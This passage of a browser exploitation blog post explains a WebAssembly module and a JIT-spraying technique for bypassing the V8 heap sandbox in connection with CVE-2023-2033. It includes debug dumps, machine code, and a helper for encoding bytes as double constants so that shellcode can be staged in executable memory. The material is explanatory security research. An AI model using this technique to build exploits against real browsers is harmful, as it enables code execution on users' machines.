Before exploring the bypass method using JIT, let’s take a quick look at the Wasm syntax used in the exploit!

(module
  ;; The common type we use throughout the sample.
  (type $int2int (func (param i32) (result i32)))

  ;; Import a function named jstimes3 from the environment and call it
  ;; $jstimes3 here.
  (import "env" "jstimes3" (func $jstimes3 (type $int2int)))

  (import "js" "tbl" (table 2 funcref))
  (func $f42 (result i32) i32.const 42)
  (func $f83 (result i32) i32.const 83)
  (elem (i32.const 0) $f42 $f83)

  (func (export "times2") (type $int2int) (i32.const 16))
  (func (export "pwn") (type $int2int) (i32.const 16) (call $jstimes3))
)

First, looking at the beginning and the end, you can see that everything is enclosed within a single (module ...) structure. This is used for the purpose of declaring a Module.

Next follows (type $int2int (func (param i32) (result i32))), which declares a function signature. It creates a signature named $int2int that takes a 32-bit integer as an argument and returns a 32-bit integer. This is also used later as the type for the jstimes3 function.

(import "env" "jstimes3" (func $jstimes3 (type $int2int))) is the declaration process that allows a JavaScript function, passed during instance creation, to be used inside the Wasm environment.

const importObject = {
    env: {
        jstimes3: (n) => 3 * n,
    },
// ...

As a result, "env" "jstimes3" refers to the external name specified during the passing process, meaning that it will be invoked as $jstimes3 when called inside the Wasm environment.

The subsequent (import ...) statements, up to the (elem ...) part, work together as a single operation to declare $f42 and $f83 and register them into the provided Table. For the table, the (table 2 funcref) segment means it is declared with a size of 2 and uses the funcref type to hold function references.

Other values belonging to Reference Types can also occupy this space besides funcref, which you can check out in the Wasm Types specification 🙃

Functions $f42 and $f83 are declared to return 32-bit integers of 42 and 83 upon invocation, respectively, and are registered to the Table via (elem (i32.const 0) $f42 $f83). Here, i32.const 0 specifies that the starting index begins at 0.

The final two lines handle declaring the export functions that can be invoked from JavaScript; as you can see, the pwn function calls the internal Wasm function $jstimes3.
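You can check this reading of the module from plain JavaScript, with no native syntax needed. The snippet below instantiates the same bytes used throughout this post (only the variable names differ) and calls the table entries and both exports.

```javascript
const tbl = new WebAssembly.Table({ initial: 2, element: "anyfunc" });
const importObject = { env: { jstimes3: (n) => 3 * n }, js: { tbl } };
const code = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 10, 2, 96, 1, 127, 1, 127, 96, 0, 1, 127, 2, 27, 2, 3, 101, 110, 118, 8, 106, 115, 116, 105, 109, 101, 115, 51, 0, 0, 2, 106, 115, 3, 116, 98, 108, 1, 112, 0, 2, 3, 5, 4, 1, 1, 0, 0, 7, 16, 2, 6, 116, 105, 109, 101, 115, 50, 0, 3, 3, 112, 119, 110, 0, 4, 9, 8, 1, 0, 65, 0, 11, 2, 1, 2, 10, 24, 4, 4, 0, 65, 42, 11, 5, 0, 65, 211, 0, 11, 4, 0, 65, 16, 11, 6, 0, 65, 16, 16, 0, 11]);
const wasmModule = new WebAssembly.Module(code);
const instance = new WebAssembly.Instance(wasmModule, importObject);
const { times2, pwn } = instance.exports;

// (elem (i32.const 0) $f42 $f83) filled table slots 0 and 1.
console.log(tbl.get(0)(), tbl.get(1)()); // 42 83

// times2 just returns the constant 16; pwn passes 16 to the imported jstimes3.
console.log(times2(5), pwn(5)); // 16 48
```

Note that times2 does not double anything despite its name: its body is only (i32.const 16), so the argument is ignored.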

3.2. Using JIT to Bypass Sandbox

3.2.1. JIT Fundamentals

As a second method for bypassing the V8 heap sandbox, there is an approach that leverages JIT. JIT, which stands for Just-In-Time, refers to a compilation technique that translates code into machine language at the exact moment the program executes. Since a method utilizing JIT for the CVE-2023-2033 exploit has also been publicly disclosed, I have briefly summarized it in this post.

const foo = () =>
{
  return [1.1, 2.2, 3.3];
}

foo();
%DebugPrint(foo);

The code above is a simple example that declares and executes a function named foo(), which returns a double array. Printing out the internal structure of the function object foo yields the following output:

DebugPrint: 0x6f1001cc631: [Function]
 - map: 0x06f1001043e5 <Map[28](HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x06f100104299 <JSFunction (sfi = 0x6f1000cb201)>
 - elements: 0x06f100000219 <FixedArray[0]> [HOLEY_ELEMENTS]
 - function prototype: <no-prototype-slot>
 - shared_info: 0x06f10011acbd <SharedFunctionInfo foo>
 - name: 0x06f10011ac35 <String[3]: #foo>
 - builtin: InterpreterEntryTrampoline
 - formal_parameter_count: 0
 - kind: ArrowFunction
 - context: 0x06f10011ad8d <ScriptContext[3]>
 - code: 0x06f100267cb9 <Code BUILTIN InterpreterEntryTrampoline>  # [1]
 - interpreted
 - bytecode: 0x06f10011ae01 <BytecodeArray[5]>
 - source code: () =>
{
  return [1.1, 2.2, 3.3];
}
 
 # ...

Looking at [1], we can see that the code field exists. Checking the object pointed to by that address reveals the following structure:

d8> %DebugPrintPtr(0x06f100267cb9);
DebugPrint: 0x6f100267cb9: [Code] in ReadOnlySpace
 - map: 0x06f100000d9d <Map[60](CODE_TYPE)>
 - kind: BUILTIN
 - builtin: InterpreterEntryTrampoline
 - instruction_start: 0x157873680  # [1]
 - flags: 2
 
 # ...

Looking at position [1] in the printed output, we can identify the exact location where the actual instructions begin. Checking the memory at that address reveals the assembly code, along with the read and execute (RX) permissions granted for code execution.

(lldb) memory read -fi -c4 0x157873680
    0x157873680: ldur   w4, [x1, #0xb]
    0x157873684: add    x4, x28, x4
    0x157873688: ldur   w20, [x4, #0x3]
    0x15787368c: add    x20, x28, x20
    
(lldb) memory region 0x157873680
[0x0000000157840000-0x0000000157fd4000) r-x
Modified memory (dirty) page list provided, 0 entries.

If we can manipulate the code field to point to an arbitrary address when invoking a JavaScript function, it consequently means we can hijack the Program Counter (PC).

3.2.2. Exploit with JIT

Unlike Wasm JIT code, which is stored outside the V8 heap region, the JIT code for standard JavaScript functions is located inside the V8 heap. To verify this behavior, I modified the previous example as follows and executed it.

const foo = () =>
{
  return [1.1, 2.2, 3.3];
}

%PrepareFunctionForOptimization(foo);
foo();
%OptimizeFunctionOnNextCall(foo);
foo();
%DebugPrint(foo);

To confirm the changes that occur after optimization, I explicitly triggered it using native syntax.

DebugPrint: 0x1d04001cc681: [Function]
 - map: 0x1d04001043e5 <Map[28](HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x1d0400104299 <JSFunction (sfi = 0x1d04000cb201)>
 - elements: 0x1d0400000219 <FixedArray[0]> [HOLEY_ELEMENTS]
 - function prototype: <no-prototype-slot>
 - shared_info: 0x1d040011ad11 <SharedFunctionInfo foo>
 - name: 0x1d040011ac35 <String[3]: #foo>
 - formal_parameter_count: 0
 - kind: ArrowFunction
 - context: 0x1d040011adf9 <ScriptContext[3]>
 - code: 0x1d040011af7d <Code TURBOFAN>  # [1]
 - source code: () =>
{
  return [1.1, 2.2, 3.3];
}

# ...

One of the differences from the initial execution is that the content indicated in [1] has changed from BUILTIN InterpreterEntryTrampoline to TURBOFAN.

d8> %DebugPrintPtr(0x1d040011af7d);
DebugPrint: 0x1d040011af7d: [Code] in OldSpace
 - map: 0x1d0400000d9d <Map[60](CODE_TYPE)>
 - kind: TURBOFAN
 - instruction_stream: 0x00015000800d <InstructionStream TURBOFAN>
 - instruction_start: 0x150008020
 - flags: 2147483869
0x15000800d: [InstructionStream]
 - map: 0x1d0400000a75 <Map(INSTRUCTION_STREAM_TYPE)>
 - code: 0x1d040011af7d <Code TURBOFAN>kind = TURBOFAN
stack_slots = 6
compiler = turbofan
address = 0x1d040011af7d

Instructions (size = 480)
0x150008020     0  10000010       adr x16, #+0x0 (addr 0x150008020)
0x150008024     4  eb02021f       cmp x16, x2
0x150008028     8  54000080       b.eq #+0x10 (addr 0x150008038)
0x15000802c     c  d2801001       movz x1, #0x80
0x150008030    10  f9678750       ldr x16, [x26, #20232]
0x150008034    14  d63f0200       blr x16

# ...

0x150008098    78  54000982       b.hs #+0x130 (addr 0x1500081c8)
0x15000809c    7c  91008043       add x3, x2, #0x20 (32)
0x1500080a0    80  f81c0343       stur x3, [x26, #-64]
0x1500080a4    84  91000442       add x2, x2, #0x1 (1)
0x1500080a8    88  d28121a4       movz x4, #0x90d
0x1500080ac    8c  b81ff044       stur w4, [x2, #-1]
0x1500080b0    90  d28000c4       movz x4, #0x6
0x1500080b4    94  b8003044       stur w4, [x2, #3]
0x1500080b8    98  d2933350       movz x16, #0x999a    # <== IEEE representations
0x1500080bc    9c  f2b33330       movk x16, #0x9999, lsl #16
0x1500080c0    a0  f2d33330       movk x16, #0x9999, lsl #32
0x1500080c4    a4  f2e7fe30       movk x16, #0x3ff1, lsl #48

Additionally, calling %DebugPrintPtr() dumped the entire code region at once, allowing us to verify the IEEE 754 representations used to output 1.1, 2.2, and 3.3. Since these values are stored in a readable and executable (RX) region, precisely manipulating these floating-point values makes it possible to stage shellcode directly into memory.
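The link between a double literal and the movz/movk immediates in the listing can be reproduced in JavaScript. In this sketch (helper names are mine), `movChunks` splits the IEEE 754 bit pattern of a double into four 16-bit pieces, lowest first, and `bytesToDouble` goes the other way, from 8 chosen bytes to the double literal that would embed them.

```javascript
// Split a double's bit pattern into four 16-bit immediates, lowest chunk first.
function movChunks(value) {
  const view = new DataView(new ArrayBuffer(8));
  view.setFloat64(0, value, true); // little-endian
  return [0, 2, 4, 6].map((offset) => view.getUint16(offset, true));
}

// Build the double whose in-memory bytes (little-endian) are exactly `bytes`.
function bytesToDouble(bytes) {
  const view = new DataView(new ArrayBuffer(8));
  bytes.forEach((b, i) => view.setUint8(i, b));
  return view.getFloat64(0, true);
}

console.log(movChunks(1.1).map((c) => c.toString(16)).join(" "));
// 999a 9999 9999 3ff1

console.log(bytesToDouble([0x9a, 0x99, 0x99, 0x99, 0x99, 0x99, 0xf1, 0x3f]));
// 1.1
```

The four chunks line up with the movz #0x999a and movk #0x9999, #0x9999, #0x3ff1 sequence in the dump above. One practical caveat: byte patterns that decode to NaN may not survive as-is, so they are best avoided when choosing constants.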

Consequently, hijacking the PC to point to this address allows for a successful bypass, as this region remains completely unaffected by the heap sandbox.

4. Takeaways

In Step 2 of our journey, we explored the core concepts of the V8 heap sandbox alongside two distinct methods to bypass it! Although this post did not directly cover the mechanics of memory corruption, both components are essential to building a functional Renderer exploit in practice.
In the upcoming Step 3, we will take a deep dive into CVE-2023-3079 and examine a full PoC that ties everything together, including the V8 heap sandbox bypass 🏋🏻‍♀️


99. References